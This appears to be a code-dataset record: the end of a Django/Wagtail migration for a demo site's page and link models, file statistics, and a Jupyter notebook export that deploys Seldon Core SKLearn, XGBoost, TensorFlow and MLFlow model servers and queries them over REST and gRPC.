                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.StandardPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='StandardIndexPageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.StandardIndexPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PersonPageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.PersonPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='HomePageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.HomePage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='HomePageCarouselItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
                ('caption', models.CharField(blank=True, max_length=255)),
                ('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.HomePage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='EventPageSpeaker',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('first_name', models.CharField(blank=True, max_length=255, verbose_name='Name')),
                ('last_name', models.CharField(blank=True, max_length=255, verbose_name='Surname')),
                ('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='speakers', to='demosite.EventPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='EventPageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.EventPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='EventPageCarouselItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
                ('caption', models.CharField(blank=True, max_length=255)),
                ('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.EventPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='EventIndexPageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.EventIndexPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        # ContactPage also inherits models.Model (contact fields mixin-style).
        migrations.CreateModel(
            name='ContactPage',
            fields=[
                ('telephone', models.CharField(blank=True, max_length=20)),
                ('email', models.EmailField(blank=True, max_length=254)),
                ('address_1', models.CharField(blank=True, max_length=255)),
                ('address_2', models.CharField(blank=True, max_length=255)),
                ('city', models.CharField(blank=True, max_length=255)),
                ('country', models.CharField(blank=True, max_length=255)),
                ('post_code', models.CharField(blank=True, max_length=10)),
                ('page_ptr', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, related_name='+', serialize=False, to='wagtailcore.Page')),
                ('body', wagtail.core.fields.RichTextField(blank=True)),
                ('feed_image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page', models.Model),
        ),
        migrations.CreateModel(
            name='BlogIndexPageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.BlogIndexPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        # Through model joining BlogEntryPage to taggit tags.
        migrations.CreateModel(
            name='BlogEntryPageTag',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_items', to='demosite.BlogEntryPage')),
                ('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='demosite_blogentrypagetag_items', to='taggit.Tag')),
            ],
            options={
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='BlogEntryPageRelatedLink',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('title', models.CharField(help_text='Link title', max_length=255)),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_links', to='demosite.BlogEntryPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='BlogEntryPageCarouselItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('link_external', models.URLField(blank=True, verbose_name='External link')),
                ('embed_url', models.URLField(blank=True, verbose_name='Embed URL')),
                ('caption', models.CharField(blank=True, max_length=255)),
                ('image', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
                ('link_document', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtaildocs.Document')),
                ('link_page', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='+', to='wagtailcore.Page')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='carousel_items', to='demosite.BlogEntryPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        # Added after BlogEntryPageTag exists so the tag manager can use it
        # as its through model.
        migrations.AddField(
            model_name='blogentrypage',
            name='tags',
            field=modelcluster.contrib.taggit.ClusterTaggableManager(blank=True, help_text='A comma-separated list of tags.', through='demosite.BlogEntryPageTag', to='taggit.Tag', verbose_name='Tags'),
        ),
    ]
| 63.769231
| 201
| 0.606353
| 2,533
| 24,870
| 5.797079
| 0.069878
| 0.06313
| 0.060065
| 0.094388
| 0.895328
| 0.88736
| 0.880074
| 0.873672
| 0.867815
| 0.846636
| 0
| 0.007116
| 0.242863
| 24,870
| 389
| 202
| 63.933162
| 0.772703
| 0.001809
| 0
| 0.748691
| 1
| 0
| 0.172461
| 0.022479
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013089
| 0
| 0.02356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a75f063c15dde42fd7fef6c6d3d3838622627b84
| 19,919
|
py
|
Python
|
doc/jupyter_execute/notebooks/server_examples.py
|
edshee/seldon-core
|
78c10fbca16a5e2a0c25b9673aa3deb220070e26
|
[
"Apache-2.0"
] | null | null | null |
doc/jupyter_execute/notebooks/server_examples.py
|
edshee/seldon-core
|
78c10fbca16a5e2a0c25b9673aa3deb220070e26
|
[
"Apache-2.0"
] | null | null | null |
doc/jupyter_execute/notebooks/server_examples.py
|
edshee/seldon-core
|
78c10fbca16a5e2a0c25b9673aa3deb220070e26
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Example Model Servers with Seldon
#
# ## Setup Seldon Core
#
# Use the setup notebook to [Setup Cluster](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Setup-Cluster) with [Ambassador Ingress](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Ambassador) and [Seldon Core](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html#Install-Seldon-Core). Instructions [also online](https://docs.seldon.io/projects/seldon-core/en/latest/examples/seldon_core_setup.html).
# In[ ]:
get_ipython().system('kubectl create namespace seldon')
# In[ ]:
get_ipython().system('kubectl config set-context $(kubectl config current-context) --namespace=seldon')
# In[ ]:
import json
# ## Serve SKLearn Iris Model
#
# In order to deploy SKLearn artifacts, we can leverage the [pre-packaged SKLearn inference server](https://docs.seldon.io/projects/seldon-core/en/latest/servers/sklearn.html).
# The exposed API can follow either:
#
# - The default Seldon protocol.
# - The [KFServing V2 protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/sklearn.html##v2-kfserving-protocol-incubating).
#
# For details on each of these protocols, you can check the [documentation section on API protocols](https://docs.seldon.io/projects/seldon-core/en/latest/graph/protocols.html#v2-kfserving-protocol).
#
# ### Default Seldon protocol
#
# To deploy and start serving an SKLearn artifact using Seldon's default protocol, we can use a config like the one below:
# In[ ]:
get_ipython().run_cell_magic('writefile', '../servers/sklearnserver/samples/iris.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: sklearn\nspec:\n predictors:\n - graph:\n name: classifier\n implementation: SKLEARN_SERVER\n modelUri: gs://seldon-models/v1.13.0-dev/sklearn/iris\n name: default\n replicas: 1\n svcOrchSpec: \n env: \n - name: SELDON_LOG_LEVEL\n value: DEBUG')
# We can then apply it to deploy it to our Kubernetes cluster.
# In[ ]:
get_ipython().system('kubectl apply -f ../servers/sklearnserver/samples/iris.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=sklearn -o jsonpath='{.items[0].metadata.name}')")
# Once it's deployed we can send our sklearn model requests
# #### REST Requests
# In[ ]:
X = get_ipython().getoutput('curl -s -d \'{"data": {"ndarray":[[1.0, 2.0, 5.0, 6.0]]}}\' -X POST http://localhost:8003/seldon/seldon/sklearn/api/v1.0/predictions -H "Content-Type: application/json"')
d=json.loads(X[0])
print(d)
# In[ ]:
from seldon_core.seldon_client import SeldonClient
sc = SeldonClient(deployment_name="sklearn", namespace="seldon")
# In[ ]:
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 4))
print(r)
assert r.success == True
# #### gRPC Requests
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 4))
print(r)
assert r.success == True
# In[ ]:
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"data":{"ndarray":[[1.0,2.0,5.0,6.0]]}}\' -rpc-header seldon:sklearn -rpc-header namespace:seldon -plaintext -proto ./prediction.proto 0.0.0.0:8003 seldon.protos.Seldon/Predict')
d=json.loads("".join(X))
print(d)
# And delete the model we deployed
# In[ ]:
get_ipython().system('kubectl delete -f ../servers/sklearnserver/samples/iris.yaml')
# ### KFServing V2 protocol
#
# We can deploy a SKLearn artifact, exposing an API compatible with [KFServing's V2 Protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/sklearn.html##v2-kfserving-protocol-incubating) by specifying the `protocol` of our `SeldonDeployment` as `kfserving`.
# For example, we can consider the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/iris-sklearn-v2.yaml', 'apiVersion: machinelearning.seldon.io/v1\nkind: SeldonDeployment\nmetadata:\n name: sklearn\nspec:\n name: iris\n protocol: kfserving\n predictors:\n - graph:\n children: []\n implementation: SKLEARN_SERVER\n modelUri: gs://seldon-models/sklearn/iris-0.23.2/lr_model\n name: classifier\n name: default\n replicas: 1')
# We can then apply it to deploy our model to our Kubernetes cluster.
# In[ ]:
get_ipython().system('kubectl apply -f resources/iris-sklearn-v2.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=sklearn -o jsonpath='{.items[0].metadata.name}')")
# Once it's deployed, we can send inference requests to our model.
# Note that, since it's using the KFServing's V2 Protocol, these requests will be different to the ones using the default Seldon Protocol.
# In[ ]:
import json
import requests
inference_request = {
"inputs": [
{"name": "predict", "shape": [1, 4], "datatype": "FP32", "data": [[1, 2, 3, 4]]}
]
}
endpoint = "http://localhost:8003/seldon/seldon/sklearn/v2/models/infer"
response = requests.post(endpoint, json=inference_request)
print(json.dumps(response.json(), indent=2))
assert response.ok
# Finally, we can delete the model we deployed.
# In[ ]:
get_ipython().system('kubectl delete -f resources/iris-sklearn-v2.yaml')
# ## Serve XGBoost Iris Model
#
# In order to deploy XGBoost models, we can leverage the [pre-packaged XGBoost inference server](https://docs.seldon.io/projects/seldon-core/en/latest/servers/xgboost.html).
# The exposed API can follow either:
#
# - The default Seldon protocol.
# - The [KFServing V2 protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/xgboost.html##v2-kfserving-protocol-incubating).
#
# For details on each of these protocols, you can check the [documentation section on API protocols](https://docs.seldon.io/projects/seldon-core/en/latest/graph/protocols.html#v2-kfserving-protocol).
# ### Default Seldon protocol
#
# We can deploy a XGBoost model uploaded to an object store by using the XGBoost model server implementation as shown in the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', 'resources/iris.yaml', 'apiVersion: machinelearning.seldon.io/v1\nkind: SeldonDeployment\nmetadata:\n name: xgboost\nspec:\n name: iris\n predictors:\n - graph:\n children: []\n implementation: XGBOOST_SERVER\n modelUri: gs://seldon-models/xgboost/iris\n name: classifier\n name: default\n replicas: 1')
# And then we apply it to deploy it to our kubernetes cluster
# In[ ]:
get_ipython().system('kubectl apply -f resources/iris.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=xgboost -o jsonpath='{.items[0].metadata.name}')")
# #### Rest Requests
# In[ ]:
X = get_ipython().getoutput('curl -s -d \'{"data": {"ndarray":[[1.0, 2.0, 5.0, 6.0]]}}\' -X POST http://localhost:8003/seldon/seldon/xgboost/api/v1.0/predictions -H "Content-Type: application/json"')
d=json.loads(X[0])
print(d)
# In[ ]:
from seldon_core.seldon_client import SeldonClient
sc = SeldonClient(deployment_name="xgboost", namespace="seldon")
# In[ ]:
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 4))
print(r)
assert r.success == True
# #### gRPC Requests
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 4))
print(r)
assert r.success == True
# In[ ]:
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"data":{"ndarray":[[1.0,2.0,5.0,6.0]]}}\' -rpc-header seldon:xgboost -rpc-header namespace:seldon -plaintext -proto ./prediction.proto 0.0.0.0:8003 seldon.protos.Seldon/Predict')
d=json.loads("".join(X))
print(d)
# And delete the model we deployed
# In[ ]:
get_ipython().system('kubectl delete -f resources/iris.yaml')
# ### KFServing V2 protocol
#
# We can deploy a XGBoost model, exposing an API compatible with [KFServing's V2 Protocol](https://docs.seldon.io/projects/seldon-core/en/latest/servers/xgboost.html##v2-kfserving-protocol-incubating) by specifying the `protocol` of our `SeldonDeployment` as `kfserving`.
# For example, we can consider the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/iris-xgboost-v2.yaml', 'apiVersion: machinelearning.seldon.io/v1\nkind: SeldonDeployment\nmetadata:\n name: xgboost\nspec:\n name: iris\n protocol: kfserving\n predictors:\n - graph:\n children: []\n implementation: XGBOOST_SERVER\n modelUri: gs://seldon-models/xgboost/iris\n name: classifier\n name: default\n replicas: 1')
# We can then apply it to deploy our model to our Kubernetes cluster.
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/iris-xgboost-v2.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=xgboost -o jsonpath='{.items[0].metadata.name}')")
# Once it's deployed, we can send inference requests to our model.
# Note that, since it's using the KFServing's V2 Protocol, these requests will be different to the ones using the default Seldon Protocol.
# In[ ]:
import json
import requests
inference_request = {
"inputs": [
{"name": "predict", "shape": [1, 4], "datatype": "FP32", "data": [[1, 2, 3, 4]]}
]
}
endpoint = "http://localhost:8003/seldon/seldon/xgboost/v2/models/infer"
response = requests.post(endpoint, json=inference_request)
print(json.dumps(response.json(), indent=2))
assert response.ok
# Finally, we can delete the model we deployed.
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/iris-xgboost-v2.yaml')
# ## Serve Tensorflow MNIST Model
# We can deploy a tensorflow model uploaded to an object store by using the
# tensorflow model server implementation as the config below.
#
# This notebook contains two examples, one which shows how you can use the
# TFServing prepackaged server with the Seldon Protocol, and a second one which
# shows how you can deploy it using the tensorflow protocol (so you can send
# requests of the exact format as you would to a tfserving server).
# ### Serve Tensorflow MNIST Model with Seldon Protocol
#
# The config file below shows how you can deploy your Tensorflow model which
# exposes the Seldon protocol.
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/mnist_rest.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: tfserving\nspec:\n name: mnist\n predictors:\n - graph:\n children: []\n implementation: TENSORFLOW_SERVER\n modelUri: gs://seldon-models/tfserving/mnist-model\n name: mnist-model\n parameters:\n - name: signature_name\n type: STRING\n value: predict_images\n - name: model_name\n type: STRING\n value: mnist-model\n - name: model_input\n type: STRING\n value: images\n - name: model_output\n type: STRING\n value: scores \n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/mnist_rest.yaml')
# In[ ]:
# Block until the underlying Deployment has rolled out.
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=tfserving -o jsonpath='{.items[0].metadata.name}')")
# In[ ]:
from seldon_core.seldon_client import SeldonClient

sc = SeldonClient(deployment_name="tfserving", namespace="seldon")
# #### REST Request
# In[ ]:
# shape=(1, 784): one flattened 28x28 image of random data.
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 784))
print(r)
assert r.success == True
# #### gRPC Request
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 784))
print(r)
assert r.success == True
# And delete the model we deployed
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/mnist_rest.yaml')
# ### Serve Tensorflow Model with Tensorflow protocol
#
# The config file below shows how you can deploy your Tensorflow model which
# exposes the Tensorflow protocol.
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/halfplustwo_rest.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: hpt\nspec:\n name: hpt\n protocol: tensorflow\n transport: rest\n predictors:\n - graph:\n children: []\n implementation: TENSORFLOW_SERVER\n modelUri: gs://seldon-models/tfserving/half_plus_two\n name: halfplustwo\n parameters:\n - name: model_name\n type: STRING\n value: halfplustwo\n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/halfplustwo_rest.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=hpt -o jsonpath='{.items[0].metadata.name}')")
# In[ ]:
import json

# half_plus_two computes y = x/2 + 2, hence input 1.0 yields 2.5 below.
X = get_ipython().getoutput('curl -s -d \'{"instances": [1.0, 2.0, 5.0]}\' -X POST http://localhost:8003/seldon/seldon/hpt/v1/models/halfplustwo/:predict -H "Content-Type: application/json"')
d=json.loads("".join(X))
print(d)
assert(d["predictions"][0] == 2.5)
# In[ ]:
# Same query over gRPC via grpcurl, using the TFServing prediction proto.
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"model_spec":{"name":"halfplustwo"},"inputs":{"x":{"dtype": 1, "tensor_shape": {"dim":[{"size": 3}]}, "floatVal" : [1.0, 2.0, 3.0]}}}\' -rpc-header seldon:hpt -rpc-header namespace:seldon -plaintext -proto ./prediction_service.proto 0.0.0.0:8003 tensorflow.serving.PredictionService/Predict')
d=json.loads("".join(X))
print(d)
assert(d["outputs"]["x"]["floatVal"][0] == 2.5)
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/halfplustwo_rest.yaml')
# ## Serve MLFlow Elasticnet Wines Model
# We can deploy an MLFlow model uploaded to an object store by using the MLFlow
# model server implementation as the config below:
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/elasticnet_wine.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: mlflow\nspec:\n name: wines\n predictors:\n - componentSpecs:\n - spec:\n # We are setting high failureThreshold as installing conda dependencies\n # can take long time and we want to avoid k8s killing the container prematurely\n containers:\n - name: classifier\n livenessProbe:\n initialDelaySeconds: 80\n failureThreshold: 200\n periodSeconds: 5\n successThreshold: 1\n httpGet:\n path: /health/ping\n port: http\n scheme: HTTP\n readinessProbe:\n initialDelaySeconds: 80\n failureThreshold: 200\n periodSeconds: 5\n successThreshold: 1\n httpGet:\n path: /health/ping\n port: http\n scheme: HTTP\n graph:\n children: []\n implementation: MLFLOW_SERVER\n modelUri: gs://seldon-models/v1.10.0-dev/mlflow/elasticnet_wine\n name: classifier\n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/elasticnet_wine.yaml')
# In[ ]:
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=mlflow -o jsonpath='{.items[0].metadata.name}')")
# ### REST requests
# In[ ]:
# 11 features per row -- the elasticnet wine model's input width.
X = get_ipython().getoutput('curl -s -d \'{"data": {"ndarray":[[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1]]}}\' -X POST http://localhost:8003/seldon/seldon/mlflow/api/v1.0/predictions -H "Content-Type: application/json"')
d=json.loads(X[0])
print(d)
# In[ ]:
from seldon_core.seldon_client import SeldonClient

sc = SeldonClient(deployment_name="mlflow", namespace="seldon")
# In[ ]:
r = sc.predict(gateway="ambassador", transport="rest", shape=(1, 11))
print(r)
assert r.success == True
# ### gRPC Requests
# In[ ]:
X = get_ipython().getoutput('cd ../executor/proto && grpcurl -d \'{"data":{"ndarray":[[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,1.1]]}}\' -rpc-header seldon:mlflow -rpc-header namespace:seldon -plaintext -proto ./prediction.proto 0.0.0.0:8003 seldon.protos.Seldon/Predict')
d=json.loads("".join(X))
print(d)
# In[ ]:
r = sc.predict(gateway="ambassador", transport="grpc", shape=(1, 11))
print(r)
assert r.success == True
# In[ ]:
get_ipython().system('kubectl delete -f ./resources/elasticnet_wine.yaml')
# ## MLFlow kfserving v2 protocol
# In[ ]:
get_ipython().run_cell_magic('writefile', './resources/elasticnet_wine_v2.yaml', 'apiVersion: machinelearning.seldon.io/v1alpha2\nkind: SeldonDeployment\nmetadata:\n name: mlflow\nspec:\n protocol: kfserving # Activate v2 protocol\n name: wines\n predictors:\n - graph:\n children: []\n implementation: MLFLOW_SERVER\n modelUri: gs://seldon-models/v1.10.0-dev/mlflow/elasticnet_wine\n name: classifier\n name: default\n replicas: 1')
# In[ ]:
get_ipython().system('kubectl apply -f ./resources/elasticnet_wine_v2.yaml')
# In[ ]:
# Wait for the Deployment backing the SeldonDeployment to become ready.
get_ipython().system("kubectl rollout status deploy/$(kubectl get deploy -l seldon-deployment-id=mlflow -o jsonpath='{.items[0].metadata.name}')")
# ## REST requests
# In[ ]:
import json
import requests

# V2 inference request for the elasticnet wine model: one named FP32 input
# per wine feature. Every input shares shape [1] and numpy content-type, so
# build the request from a feature table instead of spelling out each dict.
wine_features = [
    ("fixed acidity", 7.4),
    ("volatile acidity", 0.7000),
    ("citric acidity", 0),
    ("residual sugar", 1.9),
    ("chlorides", 0.076),
    ("free sulfur dioxide", 11),
    ("total sulfur dioxide", 34),
    ("density", 0.9978),
    ("pH", 3.51),
    ("sulphates", 0.56),
    ("alcohol", 9.4),
]
inference_request = {
    "parameters": {"content_type": "pd"},
    "inputs": [
        {
            "name": feature_name,
            "shape": [1],
            "datatype": "FP32",
            "data": [feature_value],
            "parameters": {"content_type": "np"},
        }
        for feature_name, feature_value in wine_features
    ],
}
endpoint = "http://localhost:8003/seldon/seldon/mlflow/v2/models/infer"
response = requests.post(endpoint, json=inference_request)
print(json.dumps(response.json(), indent=2))
assert response.ok
# In[ ]:
# Clean up: remove the v2 MLFlow deployment created above.
get_ipython().system('kubectl delete -f ./resources/elasticnet_wine_v2.yaml')
| 31.76874
| 1,211
| 0.651338
| 2,652
| 19,919
| 4.841252
| 0.123303
| 0.032713
| 0.031778
